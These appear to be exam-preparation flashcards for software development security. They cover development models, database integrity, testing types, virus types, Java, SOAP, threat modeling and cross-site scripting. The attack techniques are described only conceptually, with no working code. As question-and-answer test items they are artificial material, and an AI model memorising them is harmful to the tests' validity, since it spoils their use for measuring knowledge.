Software Development Security Flashcards
A new software development company has been launched to create mobile device apps for different customers. The company has talented software programmers employed, but has not been able to implement standardized development processes that can be improved upon over time. Which of the following would be the best approach for this company to take in order to improve its software development processes? A. Capability Maturity Model Integration B. System development life cycle C. ISO/IEC 27002 D. Certification and accreditation processes
A. Capability Maturity Model Integration (CMMI) for development is a comprehensive integrated set of guidelines for developing products and software. It addresses the different phases of a software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance and what should happen in each phase. The model describes procedures, principles, and practices that underlie software development process maturity. This model was developed to help software vendors improve their development processes by providing an evolutionary path from an ad hoc “fly by the seat of your pants” approach to a more disciplined and repeatable method that improves software quality, reduces the life cycle of development, provides better project management capabilities, allows for milestones to be created and met in a timely manner, and takes a more proactive approach than the less effective reactive approach. Images B is incorrect because the system development life cycle (SDLC) addresses how a system should be developed and maintained throughout its life cycle and does not entail process improvement. Each system has its own life cycle, which is made up of the following phases: initiation, acquisition/development, implementation, operation/maintenance, and disposal. A system development life cycle is different from a software development life cycle, even though they are commonly confused. The industry as a whole is starting to differentiate between system and software life-cycle processes because at a certain point of granularity, the manner in which a computer system is dealt with is different from how a piece of software is dealt with. A computer system should be installed properly, tested, patched, scanned continuously for vulnerabilities, monitored, and replaced when needed. A piece of software should be designed, coded, tested, documented, released, and maintained. In either case, the question is asking for a type of process improvement model for software development, which is the focus of Capability Maturity Model Integration and not a system development life cycle. Images C is incorrect because ISO/IEC 27002 is an international standard created by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) that outlines how to create and maintain an organizational information security management system (ISMS). While ISO/IEC 27002 has a section that deals with information systems acquisition, development, and maintenance, it does not provide a process improvement model for software development. It provides guidance on how to build security into applications, but it does not provide guidance on how to create standardized development procedures for a team of programmers. The focus of ISO/IEC 27002 is how to build a security program within an organization. Images D is incorrect because a certification and accreditation (C&A) process deals with testing and evaluating systems against a predefined criteria. This does not have anything to do with software development process improvement. The certification process is the technical testing of a system. Established verification procedures are followed to ensure the effectiveness of the system and its security controls. Accreditation is the formal authorization given by management to allow a system to operate in a specific environment. The accreditation decision is based upon the results of the certification process. C&A procedures are commonly carried out within government and military environments to ensure that systems and software are providing the necessary functionality and security to support critical missions.
Database software should meet the requirements of what is known as the ACID test. Why should database software carry out atomic transactions, which is one requirement of the ACID test, when OLTP is used? A. So that the rules for database integrity can be established B. So that the database performs transactions as a single unit without interruption C. To ensure that rollbacks cannot take place D. To prevent concurrent processes from interacting with each other
B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure no data is corrupted or that only part of a transaction happens. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test: • Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. • Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. • Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. • Durability Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back. The term “atomic” means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database. Images A is incorrect because OLTP and ACID enforce, but do not establish, the integrity rules that are outlined in the database security policy. Representing the letter C in ACID, consistency relates to the enforcement and enforceability of integrity rules. Database software that demonstrates consistency conducts transactions that follow a specific integrity policy and ensure all data is the same in the different databases. Images C is incorrect because atomicity divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. This means if something does not happen correctly, the database is reverted (rolled back) to its original state. After the transaction happens properly, a rollback cannot take place, which is the durability component of the ACID test. This question is specifically asking about the atomic transaction approach, not durability. Images D is incorrect because atomic transactions do not address the isolation of processes that are carrying out database transactions; this is the “isolation” component of the ACID test. It is important that a process that is carrying out a transaction cannot be interrupted or modified by another process. This is to ensure the integrity, accuracy, and confidentiality of the data that is being processed during the transaction.
Lisa has learned that most databases implement concurrency controls. What is concurrency, and why must it be controlled? A. Processes running at different levels, which can negatively affect the integrity of the database if not properly controlled B. The ability to deduce new information from reviewing accessible data, which can allow an inference attack to take place C. Processes running simultaneously, which can negatively affect the integrity of the database if not properly controlled D. Storing data in more than one place within a database, which can negatively affect the integrity of the database if not properly controlled
C. Databases are commonly used by many different applications simultaneously and many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other’s data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else. Images A is incorrect because concurrency refers to processes running simultaneously, not at different levels. Concurrency issues come up when the database can be accessed at the same time by different users and/or applications. If controls are not in place, two users can access and modify the same data at the same time, which can be detrimental to a dynamic environment. Images B is incorrect because the ability to deduce new information from reviewing accessible data occurs when a subject at a lower security level indirectly guesses or infers data at a higher level. This can lead to an inference attack. It is not related to concurrency. Concurrency has to do with integrity, while inference is related to confidentiality. Images D is incorrect because storing data in more than one place is not a problem with concurrency. Concurrency becomes a problem when two subjects or applications are trying to modify the same data at the same time.
Robert has been asked to increase the overall efficiency of the sales database by implementing a procedure that structures data to minimize duplication and inconsistencies. What procedure is this? A. Polymorphism B. Normalization C. Implementation of database views D. Constructing schema
B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity. Images A is incorrect because polymorphism is when different objects are given the same input and react differently. As a simplistic example of polymorphism, suppose three different objects receive the input “Bob.” Object A would process this input and produce the output “43-year-old white male.” Object B would receive the input “Bob” and produce the output “Husband of Sally.” Object C would produce the output “Member of User group.” Each object received the same input but responded with a different output. Images C is incorrect because database views are logical access controls and are implemented to permit one group, or a specific user, to see certain information while restricting another group from viewing it altogether. For example, database views can be implemented to allow middle management to see their departments’ profits and expenses without viewing the whole company’s profits. Database views do not minimize duplicate data; rather, they manipulate how data is viewed by specific users/groups. Images D is incorrect because schema of a database system is its structure described in a formal language. In a relational database, the schema defines the tables, the fields, relationships, views, indexes, procedures, queues, database links, directories, and so on. The schema describes the database and its structure, but not the data that will live within that database itself. This is similar to a blueprint of a house. The blueprint can state that there will be four rooms, six doors, 12 windows, and so on without describing the people who will live in the house.
Which of the following correctly best describes an object-oriented database? A. When an application queries for data, it receives both the data and the procedure. B. It is structured similarly to a mesh network for redundancy and fast data retrieval. C. Subjects must have knowledge of the well-defined access path in order to access data. D. The relationships between data entities provide the framework for organizing data.
A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called method) go with the object when it is requested. This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database. Images B is incorrect because a mesh network is a physical topology and has nothing to do with databases. A mesh topology is a network of interconnected routers and switches that provides multiple paths to all the nodes on the network. In a full mesh topology, every node is directly connected to every other node, which provides a great degree of redundancy. In a partial mesh topology, every node is not directly connected. The Internet is an example of a partial mesh topology. Images C is incorrect because subjects accessing a hierarchical database—not an object-oriented database—must have knowledge of the access path in order to access data. In the hierarchical database model, records and fields are related in a logical tree structure. Parents can have one child, many children, or no children. The tree structure contains branches, and each branch has a number of data fields. To access data, the application must know which branch to start with and which route to take through each layer until the data is reached. Images D is incorrect because the relationships between data entities provide the framework for organizing data in a relational database. A relational database is composed of two-dimensional tables, and each table contains unique rows, columns, and cells. Each cell contains one data value that represents a specific attribute within a given row. These data entities are linked by relationships, which provide the framework for organizing the data.
Fred has been told he needs to test a component of the new content management application under development to validate its data structure, logic, and boundary conditions. What type of testing should he carry out? A. Acceptance testing B. Regression testing C. Integration testing D. Unit testing
D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions. After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units. Images A is incorrect because acceptance testing is carried out to ensure that the code meets customer requirements. This testing is for part or all of the application, but not commonly one individual component. Images B is incorrect because regression testing refers to the retesting of a system after a change has taken place to ensure its functionality, performance, and protection. Essentially, regression testing is done to identify bugs that have caused functionality to stop working as intended as a result of program changes. It is not unusual for developers to fix one problem, only to inadvertently create a new problem, or for the new fix to break a fix to an old problem. Regression testing may include checking previously fixed bugs to make sure they have not re-emerged and rerunning previous tests. Images C is incorrect because integration testing involves verifying that components work together as outlined in design specifications. After unit testing, the individual components or units are combined and tested together to verify that they meet functional, performance, and reliability requirements.
Which of the following is the best description of a component-based system development method? A. Components periodically revisit previous stages to update and verify design requirements B. Minimizes the use of arbitrary transfer control statements between components C. Uses independent and standardized modules that are assembled into serviceable programs D. Implemented in module-based scenarios requiring rapid adaptations to changing client requirements
C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces to communicate with each other. Component-based development adds reusability and pluggable functionality into programs, and is widely used in modern programming to augment program coherence and substantially reduce software maintenance costs. A common example of these modules is “objects” that are frequently used in object-oriented programming. Images A is incorrect because the spiral method of system development periodically revisits previous stages to update and verify design requirements. The spiral method builds upon the waterfall method. It uses discrete phases of development with an emphasis on risk analysis, prototypes, and simulations. The spiral method does not specify the development and testing of components. Images B is incorrect because structured programming development involves the use of logical blocks to achieve system design using procedural programming. A structured program layout minimizes the use of arbitrary transfer control statements like GOTO and emphasizes on single points of entry and exit. This hierarchical approach makes it easier for the program to be understood and modified later on. Images D is incorrect because extreme programming is a methodology that is generally implemented in scenarios requiring rapid adaptations to changing client requirements. Extreme programming emphasizes client feedback to evaluate project outcomes and to analyze project domains that may require further attention. The coding principle of extreme programming throws out the traditional long-term planning carried out for code reuse and instead focuses on creating simple code optimized for the contemporary assignment.
There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus? A. Intercepts antimalware’s call to the operating system for file and system information B. Varies the sequence of its instructions using noise, a mutation engine, or random-number generator C. Can use different encryption schemes requiring different decryption routines D. Produces multiple, varied copies of itself
A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antimalware program. When the antimalware conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antimalware and the operating system, then when the antimalware sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antimalware scanners, but it does so by producing varied but operational copies of itself. Even if antimalware software finds and disables one or two copies, other copies may still remain active within the system. Images B is incorrect because a polymorphic virus can vary the sequence of its instructions by including noise, or bogus instructions, with other useful instructions. It can also use a mutation engine and a random-number generator to change the sequence of its instructions in the hopes of not being detected. The original functionality stays the same, but the code changes, making it close to impossible to identify all versions of the virus using a fixed signature. Images C is incorrect because a polymorphic virus can use different encryption schemes requiring different decryption routines. This requires an antimalware scan for several scan strings, one for each possible decryption method, in order to identify all copies of this type of virus. Polymorphic virus writers most commonly hide a virus’s payload with encryption and add a decryption method to the code. Once it is encrypted, the code is meaningless. However, a virus that is encrypted is not necessarily a polymorphic virus. To be polymorphic, the virus’s encryption and decryption algorithms must mutate with each new version of itself. Images D is incorrect because a polymorphic virus produces multiple varied copies of itself in an effort to avoid detection by antimalware software. A polymorphic virus has the capability to change its own code, enabling the virus to have hundreds or thousands of variants. These activities can cause the virus scanner to not properly recognize the virus and to leave it to do its damage.
Which of the following best describes the role of the Java Virtual Machine in the execution of Java applets? A. Converts the source code into bytecode and blocks the sandbox B. Converts the bytecode into machine-level code C. Operates only on specific processors within specific operating systems D. Develops the applets, which run in a user’s browser
B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand. Images A is incorrect because the Java Virtual Machine converts the bytecode into machine-level code. It does not convert the source code into bytecode—a Java compiler does that. The JVM also creates a virtual machine within an environment called a sandbox. This virtual machine is an enclosed environment in which the applet carries out its activities. Applets are commonly sent over HTTP within a requested web page, which means the applet executes as soon as it arrives. It can carry out malicious activity on purpose or accidentally if the developer of the applet did not do his part correctly. So the sandbox strictly limits the applet’s access to any system resources. The JVM mediates access to system resources to ensure the applet code behaves and stays within its own sandbox. Images C is incorrect because Java is an object-oriented, platform-independent programming language. Other languages are compiled to object code for a specific operating system and processor. This is why a particular application may run on Windows but not on Mac OS. An Intel processor does not necessarily understand machine code compiled for an Alpha processor, and vice versa. Java is platform independent because it creates intermediate code—bytecode—which is not processor specific. Images D is incorrect because the Java Virtual Machine does not write applets. Java is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. A programmer creates a Java applet and runs it through a compiler. The Java compiler converts the source code into bytecode. The user then downloads the Java applet. The bytecode is converted into machine-level code by the JVM. Finally, the applet runs when called upon.
What type of database software integrity service guarantees that tuples are uniquely identified by primary key values? A. Concurrent integrity B. Referential integrity C. Entity integrity D. Semantic integrity
C. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A tuple is a row in a two-dimensional database. A primary key is a value in the corresponding column that makes each row unique. For the sake of entity integrity, every tuple must contain one primary key. If a tuple does not have a primary key, it cannot be referenced by the database. Images A is incorrect because concurrent integrity is not a database software formal term. This is a distracter answer. There are three main types of integrity services: semantic, referential, and entity. Concurrency refers to a piece of software being accessed by multiple users and/or applications at the same time. If controls are not in place, two users can access and modify the same data simultaneously. Images B is incorrect because referential integrity refers to all foreign keys referencing existing primary keys. There should be a mechanism in place that ensures that no foreign key contains a reference to a primary key of a nonexistent record or a null value. This type of integrity control ensures that the relationships between the different tables are working and can properly communicate to each other. Images D is incorrect because a semantic integrity mechanism ensures that structural and semantic rules of a database are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database.
In computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling? A. Low cohesion, low coupling B. High cohesion, high coupling C. Low cohesion, high coupling D. High cohesion, low coupling
D. When a module is described as having high cohesion and low coupling, that is a good thing. Cohesion reflects how many different types of tasks a module can carry out. High cohesion means that the module carries out one basic task (such as subtraction of values) or several tasks that are very similar (such as subtraction, addition, multiplication). The higher the cohesion, the easier it is to update or modify and not affect the other modules that interact with it. This also means the module is easier to reuse and maintain because it is more straightforward when compared to a module with low cohesion. Coupling is a measurement that indicates how much interaction one module requires to carry out its tasks. If a module has low or loose coupling, this means the module does not need to communicate with many other modules to carry out its job. These modules are easier to understand and easier to reuse than those that depend upon many other modules to carry out their tasks. It is also easier to make changes to these modules without affecting many modules around them. Images A is incorrect because a module with low cohesion is not desirable. A module with low cohesion carries out multiple different tasks and increases the complexity of the module, which makes it harder to maintain and reuse. The higher a module’s cohesion, the fewer tasks it carries out and the easier it is to update or modify that module without affecting others that interact with it. Images B is incorrect because a module with high coupling is not desirable. High coupling means a module depends upon many other modules to carry out its tasks. This makes it difficult to understand, reuse, and make changes because of the interdependencies with other modules. As an analogy, a company would want its employees to be able to carry out their individual jobs with the least amount of dependencies on other workers. If Joe had to talk with five other people just to get one task done, too much complexity exists, it’s too time consuming, and more places are created where errors can take place. Images C is incorrect because it states the exact opposite of what is desirable. A module that has low cohesion and high coupling is complex in that it carries out multiple different types of tasks and depends upon many other modules to carry them out. These characteristics make the module harder to maintain and reuse, largely because of the greater possibility of affecting other modules that interact with it.
Which of the following statements does not correctly describe SOAP and Remote Procedure Calls? A. SOAP was designed to overcome the compatibility and security issues associated with Remote Procedure Calls. B. Both SOAP and Remote Procedure Calls were created to enable application-layer communication. C. SOAP enables the use of Remote Procedure Calls for information exchange between applications over the Internet. D. HTTP was not designed to work with Remote Procedure Calls, but SOAP was designed to work with HTTP.
C. The Simple Object Access Protocol (SOAP) was created to use instead of Remote Procedure Calls (RPCs) to allow applications to exchange information over the Internet. SOAP is an XML-based protocol that encodes messages in a web service setup. It allows programs running on different operating systems to communicate over web-based communication methods. Images A is incorrect because SOAP was created to overcome the compatibility and security issues that RPCs introduced when trying to enable communication between objects of different applications over the Internet. SOAP is designed to work across multiple operating system platforms, browsers, and servers. Images B is incorrect because it is true that both SOAP and RPCs were created to enable application-layer communication. SOAP is an XML-based protocol that encodes messages in a web service setup. So if you have a Windows client and you need to access a Windows server that offers a specific web service, the programs on both systems can communicate using SOAP without running into interoperability issues. This communication most commonly takes place over HTTP, since it is readily available in basically all computers today. Images D is incorrect because the statement is correct: HTTP was not designed to specifically work with RPCs, but SOAP was designed to work with HTTP. SOAP actually defines an XML schema or a structure of how communication is going to take place. The SOAP XML schema defines how objects communicate directly. One advantage of SOAP is that the program calls will most likely get through firewalls since HTTP communication is commonly allowed. This helps ensure that the client/server model is not broken by getting denied by a firewall in between the communicating entities.
Which of the following is a correct description of the pros and cons associated with third-generation programming languages? A. The use of heuristics reduced programming effort, but the amount of manual coding for a specific task is usually more than the preceding generation. B. The use of syntax similar to human language reduced development time, but the language is resource intensive. C. The use of binary was extremely time consuming but resulted in fewer errors. D. The use of symbols reduced programming time, but the language required knowledge of machine architecture.
B. Third-generation programming languages are easier to work with compared to earlier languages because their syntax is similar to human languages. This reduces program development time and allows for simplified and swift debugging. However, these languages can be very resource intensive when compared to the second-generation programming languages. Images A is incorrect because it attempts to describe the pros and cons of fourth-generation programming. It is true that the use of heuristics in fourth-generation programming languages drastically reduced the programming effort and the possibility of errors in code. However, it is not true that the amount of manual coding was usually more than that required of third-generation languages. On the contrary, the most remarkable aspect of fourth-generation languages is that the amount of manual coding required to perform a specific task may be ten times less than for the same task on a third-generation language. Images C is incorrect because the statement alludes to the pros and cons of machine language, the first-generation programming language. The first portion of the statement is true: Programming in binary was time consuming. The second half, however, is incorrect. Programming in binary was very prone to errors. Images D is incorrect because it describes second-generation programming languages. By introducing symbols to represent complicated binary codes, second-generation programming languages reduced programming and debugging times. Unfortunately, these languages required extensive knowledge of machine architecture, and the programs that were written in it were hardware specific.
It can be very challenging for programmers to know what types of security should be built into the software that they create. The amount of vulnerabilities, threats, and risks involved with software development can seem endless. Which of the following describes the best first step for developers to take to identify the security controls that should be coded into a software project? A. Penetration testing B. Regression testing C. Threat modeling D. Attack surface analysis
C. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is created to define a set of possible attacks that can take place so the necessary countermeasures can be identified and implemented. Through the use of a threat model, the software team can identify and rate threats. Rating the threats based upon the probability of exploitation and the associated impact of each exploitation allows the team to focus on the threats that present the greatest risk. When using threat modeling in software development, the process starts at the design phase and should continue in an iterative process through each phase of the software’s life cycle. Different software development threat modeling approaches exist, but they have many of the same steps, including identifying assets, trust boundaries, data flows, entry points, privilege code, etc. This approach also includes building attack trees, which represent the goals of each attack and the attack methodologies. The output of all of these steps is then reviewed and security controls selected and coded into the software. Images A is incorrect because penetration testing is basically attacking a system to identify any weaknesses or vulnerabilities. A penetration test can be carried out on the software only after it has been at least partially developed; it is not a tool that can be used at the coding stage. A penetration test is different from building a threat model. A threat model is developed so that vulnerabilities and their associated threats can be identified and removed or mitigated. A threat model outlines all of the possible attack vectors that could be exploited. A penetration test is the act of exploiting vulnerabilities in the real world to fully understand what an attacker can accomplish when exploiting specific vulnerabilities. Images B is incorrect because regression testing is a type of test that is carried out to identify software bugs that exist after changes have taken place. The goal of regression testing is to ensure that changes that have taken place do not introduce new faults. Testers need to figure out if a change to one part of a software program will affect other parts of the software. A software regression is a bug (flaw) that makes a feature stop working after a change (e.g., patch applied, software upgrade) takes place. A software performance regression is a fault that does not cause the feature to stop working, but the performance of the function is degraded. Regression testing is not security focused and is not used with the goals of identifying vulnerabilities. Images D is incorrect because an attack surface analysis is used to map out the parts of a software program that need to be reviewed and tested for vulnerabilities. An attack surface consists of the components that are available to be used by an attacker against the software itself. The attack surface is a sum of the different attack vectors that can be used by an unauthorized user to compromise the system. The more attack surface that is available to attackers, the more they have to work with and use against the software itself. Securing software commonly includes reducing the attack surface and applying defense-in-depth to the portions of the software that cannot have their surface reduced. There is a recursive relationship between an attack surface analysis and threat modeling. When there are changes to an attack surface, threat modeling should take place to identify the new threats that will need to be dealt with. So an attack surface analysis charts out what areas need to be analyzed, and threat modeling allows the developers to walk through attack scenarios to determine the reality of each identified threat.
Mary is creating malicious code that will steal a user’s cookies by modifying the original client-side Java script. What type of cross-site scripting vulnerability is she exploiting? A. Second order B. DOM-based C. Persistent D. Nonpersistent
B. Mary is exploiting a document object model (DOM)–based cross-site scripting (XSS) vulnerability, which is also referred to as local cross-site scripting. DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim’s browser to execute the resulting abusive JavaScript code. The most effective way to prevent these attacks is to disable scripting support in the browser. Images A is incorrect because a second-order vulnerability, or persistent XSS vulnerability, is targeted at websites that allow users to input data that is stored in a database or other location, such as a forum or message board. Second-order vulnerabilities allow the most dominant type of attacks. Images C is incorrect because a persistent XSS vulnerability is simply another name for a second-order vulnerability. As previously stated, these vulnerabilities allow users to input data that is stored in a database or other location such as an online forum or message board. These types of platforms are among the most commonly plagued by XSS vulnerabilities. The best way to overcome these vulnerabilities is through secure programming practices. Each and every user input should be filtered, and only a limited set of known and secure characters should be allowed for user input. Images D is incorrect because nonpersistent XSS vulnerabilities, also referred to as reflected vulnerabilities, occur when an attacker tricks the victim into opening a URL programmed with a rogue script to steal the victim’s sensitive information (such as a cookie). The principle behind this attack lies in exploiting lack of proper input or output validation on dynamic websites.